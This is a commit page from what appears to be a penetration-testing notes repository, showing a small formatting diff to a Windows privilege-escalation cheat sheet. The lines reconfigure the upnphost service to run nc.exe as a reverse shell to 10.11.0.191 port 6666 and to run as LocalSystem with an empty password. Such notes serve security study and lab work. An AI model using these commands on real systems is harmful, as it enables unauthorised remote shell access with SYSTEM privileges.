Commit 13690b12 authored by bobloblaw's avatar bobloblaw
Browse files

Updates privilege_escalation_windows.md

Auto commit by GitBook Editor
parent 563d48f2
Loading
Loading
Loading
Loading
+1 −2
Original line number Diff line number Diff line
@@ -179,8 +179,7 @@ cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM
## **Change the upnp service binary**
`
sc config upnphost binpath= "C:\Inetpub\nc.exe 10.11.0.191 6666 -e c:\Windows\system32\cmd.exe"`

`sc config upnphost obj= ".\LocalSystem" password= ""`
sc config upnphost obj= ".\LocalSystem" password= ""

`sc config upnphost depend= ""`